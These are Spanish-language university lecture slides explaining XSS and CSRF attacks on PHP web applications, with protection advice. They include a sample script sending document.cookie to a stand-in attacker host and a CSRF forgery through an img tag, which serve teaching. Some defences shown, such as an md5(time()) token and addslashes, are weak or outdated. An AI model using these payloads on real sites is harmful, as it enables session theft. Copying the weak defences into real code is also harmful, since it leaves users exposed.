Ataques XSS y CSRF

CI-2413 Desarrollo de Aplicaciones para Internet

Seguridad

• Podremos hablar de aplicaciones web seguras y inseguras.

• Por definición una aplicación web segura es aquella que es 100% invulnerable a cualquier tipo de ataque.

• Sobre esta base se pueden considerar las aplicaciones web como inseguras.

• Se verá protección contra dos tipos de ataques.

Cross-Site Scripting (XSS)

• El error fundamental que conduce a vulnerabilidades de tipo XSS es tener confianza en los datos foráneos.

• La recomendación general es desconfiar siempre de los datos del visitante.

• Como datos foráneos vamos a considerar cualquier dato que reciba el servidor web. V.G.: correo emitido por un cliente de correo web, un banner publicitario, las citas proveidas por XML vía HTTP, los datos del visitante, ...

Ejemplo de XSS

• Considere el siguiente formulario:<form action="/registrar.php" method="post">

<p>Nombre de usuario: <input type="text" name="reg_usuario" /></p>

<p>Email: <input type="text" name="reg_email" /></p>

<p><input type="submit" value="Registrar" />

</form>

Ejemplo de XSS

• Ahora considere el siguiente script de inserción de los datos:if (!get_magic_quotes_gpc()) {

$_POST['reg_usuario'] = addslashes($_POST['reg_usuario']);

$_POST['reg_email'] = addslashes($_POST['reg_email']);

}

$sql = "insert into users (username, email) values ('{$_POST['reg_usuario ']}', '{$_POST['reg_email']}')";

Ejemplo de XSS

• Imagine el siguiente nombre de usuario:<script>alert('¡Oh no!');</script>

• Se puede determinar fácilmente que el código anterior no es nombre de usuario válido, lo cual demuestra que el código que escribimos no es siempre prudente.

• Por supuesto, el peligro de XSS reside en el efecto producido cuando los datos son reenviados a otros utilizadores.

Ejemplo de XSS

• Despligue por un administrador:<table>

<tr>

<th>Usuario</th>

<th>Email</th>

</tr>

<?php

if ($_SESSION['admin']) {

$sql = 'select username,email from users';

$result = mysql_query($sql);

while ($user = mysql_fetch_assoc($result)) {

echo "\t<tr>\n";

echo "\t\t<td>{$user['username']}</td>\n";

echo "\t\t<td>{$user['email']}</td>\n";

echo "\t</tr>\n";

}

}

?>

</table>

Ejemplo de XSS

• En el ejemplo anterior si los datos no son validados antes de ser guardados, el administrador podrá ser sujeto de un ataque XSS.

Ejemplo de XSS

• El riesgo es aún más evidente con algún ataque más vicioso como el siguiente:<script>

document.location = 'http://maligno.ejemplo.org/roba_cookies.php?cookies=' + document.cookie

</script>

• En este ejemplo, el script distante roba_cookies.php puede acceder a los cookies con la variable $_GET['cookies']. Un vez capturados los cookies pueden ser utilizados para lanzar ataques de usurpación de identidad, obtener datos sensibles, etc.

Protegerse contra XSS

• Filtrar todos los datos foráneos.

• Utilizar la funcionalidad existente: htmlentities(), strip_tags, utf8_decode(), etc. pueden ayudar a escribir la lógica de filtrado.

• Solamente autorizar un contenido validado.

• Utilizar una convención de nombres descriptiva.

• Ser creativo.

Cross-Site Request Forgeries (CSRF)

• Este tipo de ataques en lugar de explotar la confianza del usuario explotan la confianza que hace el sitio web a sus usuarios.

• CSRF implica la simulación de solicitudes HTTP, por lo cual es muy importante entender las solicitudes HTTP.

Ejemplo de CSRF

• Considere un foro hipotético en http://foro.ejemplo.org/ que utiliza el siguiente formulario:<form action="/add_post.php">

<p>Asunto: <input type="text" name="post_subject" /></p>

<p>Mensaje: <textarea name="post_message"></textarea></p>

<p><input type="submit" value="Enviar" /></p>

</form>

Ejemplo de CSRF

• Dado que en el código anterior no se indicó POST una solicitud GET es enviada:GET /add_post.php?post_subject=foo&post_message=bar

HTTP/1.1

HOST: foro.ejemplo.org

Cookie: PHPSESSID=123456789

Ejemplo de CSRF

• Considere la etiqueta <img> siguiente:<img src="http://foro.ejemplo.org/add_post.php?

post_subject=foo&post_message=bar” />

• Cuando un navegador pida esta imagen va a enviar exactamente la misma solicitud de la filmina anterior. La víctima va a enviar un mensaje en el foro y sin darse cuenta.

Protegerse contra CSRF

• Utilizar el método POST en los formularios.

• Utilizar el arreglo $_POST en lugar de las variables creadas gracias a register_globals.

• No simplificar las acciones importantes.

• Obligar al usuario a utilizar nuestros formularios HTML.

Protegerse contra CSRF

• Un ejemplo de técnica para obligar al usuario a utilizar nuestros propios formularios es la siguiente:

<?php

$token = md5(time());

$_SESSION['token'] = $token;

$_SESSION['token_timestamp'] = time();

?>

<form action="/add_post.php">

<input type="hidden" name="token" value="<?php echo $token; ?>" />

<p>Asunto: <input type="text" name="post_subject" /></p>

<p>Mensaje: <textarea name="post_message"></textarea></p>

<p><input type="submit" value="Enviar" /></p>

</form>

Lecturas adicionales

• PHP Under Attaque: presentación sobre XSS y CSRF– http://talks.php.net/show/php-under-attack/

• XSS– http://httpd.apache.org/info/css-security/

– http://www.cgisecurity.com/articles/xss-faq.shtml

– http://www.php-secure.info/v2/article/XSS.php

• CSRF– http://www.tux.org/~peterw/csrf.txt

Proyecto de seguridad

• XSS:– HTMLfilter es un proyecto para PHP que

analiza todos los datos HTTP antes de ser utilizados.